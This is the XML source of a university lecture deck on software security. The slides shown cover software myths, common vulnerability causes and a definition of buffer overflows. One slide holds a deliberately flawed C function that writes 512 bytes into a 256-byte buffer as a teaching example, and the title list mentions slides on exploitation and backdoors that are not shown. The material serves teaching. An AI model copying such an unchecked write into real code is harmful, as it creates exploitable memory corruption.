              <a:buAutoNum type="arabicPeriod" startAt="4"/>
              <a:tabLst>
                <a:tab pos="1485900" algn="l"/>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>The licensing of software engineers through standardized tests – as done in the medical field – will eliminate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400"/>
              <a:t>bad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400"/>
              <a:t> software.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124776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a:t>Ten Software Myths </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>(continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98307" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1219200"/>
            <a:ext cx="7315200" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPct val="25000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Test automation leads to better testing and, therefore, better software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPct val="25000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Because it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t>s so complex, software is bound to be unreliable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPct val="25000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Advances in programming languages and software development technologies have led to software becoming more reliable and secure and virtually glitch-free.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPct val="25000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Our legacy network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t>s existing software security measures should be sufficient when we add wireless access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268902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a:t>Common Causes </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158723" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="1371600"/>
            <a:ext cx="579120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a:spcBef>
                <a:spcPct val="25000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="25000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Timing Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="25000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure Default Configurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="25000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bad Protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="25000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trusting Untrustworthy Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158724" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="4648200"/>
            <a:ext cx="748347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1" i="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>If you can develop software that prevents these top five categories, you are going to prevent thousands of potential vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" i="1">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387459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t>What is a Buffer Overflow?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99331" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1295400"/>
            <a:ext cx="7010400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Good paper on buffer overflows by Aleph One entitled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t>Smashing the Stack for Fun and Profit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Allows an attacker to execute arbitrary commands on your machine, locally or across the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Putting too much information into undersized receptacles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Giving the program more data than the developers of the program allocated for it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Caused by not having proper bounds checking in software</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298741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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example of a Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100355" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="1524000"/>
            <a:ext cx="6400800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>funct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>(void)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>   {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> I;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>		  char buffer[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>       for(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>=0;i&lt;512;i++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>              buffer[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>       return;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>   }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36336528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3532</TotalTime>
  <Words>3868</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>366</Paragraphs>
  <Slides>40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 Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Default Design</vt:lpstr>
      <vt:lpstr>Lecture 11: Software Security   CS 07351: Cyber Security: Fundamentals, Principles and Applications  Dr. Vahid Heydari</vt:lpstr>
      <vt:lpstr>Content</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Ten Software Myths</vt:lpstr>
      <vt:lpstr>Ten Software Myths (continued)</vt:lpstr>
      <vt:lpstr>Ten Software Myths (continued)</vt:lpstr>
      <vt:lpstr>Common Causes </vt:lpstr>
      <vt:lpstr>What is a Buffer Overflow?</vt:lpstr>
      <vt:lpstr>Example of a Buffer Overflow</vt:lpstr>
      <vt:lpstr>What is a Stack?</vt:lpstr>
      <vt:lpstr>Smashing the Stack</vt:lpstr>
      <vt:lpstr>Buffer Overflow Attack with a C Program Example</vt:lpstr>
      <vt:lpstr>Exploiting Buffer Overflows</vt:lpstr>
      <vt:lpstr>Now What?</vt:lpstr>
      <vt:lpstr>Create a backdoor Using Inetd</vt:lpstr>
      <vt:lpstr>Buffer Overflows and Backdoors</vt:lpstr>
      <vt:lpstr>Buffer Overflow – Minimum Defense</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Buffer Overflow Defenses – Better Programs!</vt:lpstr>
      <vt:lpstr>Backdoor Defenses</vt:lpstr>
      <vt:lpstr>Dangerous Functions</vt:lpstr>
      <vt:lpstr>Miscalculations</vt:lpstr>
      <vt:lpstr>Integer manipulation</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Different Sized Integers</vt:lpstr>
      <vt:lpstr>Integer wrapping</vt:lpstr>
      <vt:lpstr>Example 1: Addition</vt:lpstr>
      <vt:lpstr>Format String Attacks</vt:lpstr>
      <vt:lpstr>Printf misuse</vt:lpstr>
      <vt:lpstr>Printf misuse (continued)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Learning Outcomes</vt:lpstr>
      <vt:lpstr>Exception</vt:lpstr>
      <vt:lpstr>Exception: What’s The Risk?</vt:lpstr>
      <vt:lpstr>Exception: Example</vt:lpstr>
      <vt:lpstr>Exception: Example</vt:lpstr>
      <vt:lpstr>Sensitive Information</vt:lpstr>
      <vt:lpstr>Sensitive Information: What’s The Risk?</vt:lpstr>
      <vt:lpstr>Sensitive Information: Example</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>GreyHats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 Threats</dc:title>
  <dc:creator>naumann</dc:creator>
  <cp:lastModifiedBy>Vahid Heydari</cp:lastModifiedBy>
  <cp:revision>113</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2002-07-28T21:23:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-14T15:37:15Z</dcterms:modified>
</cp:coreProperties>
</file>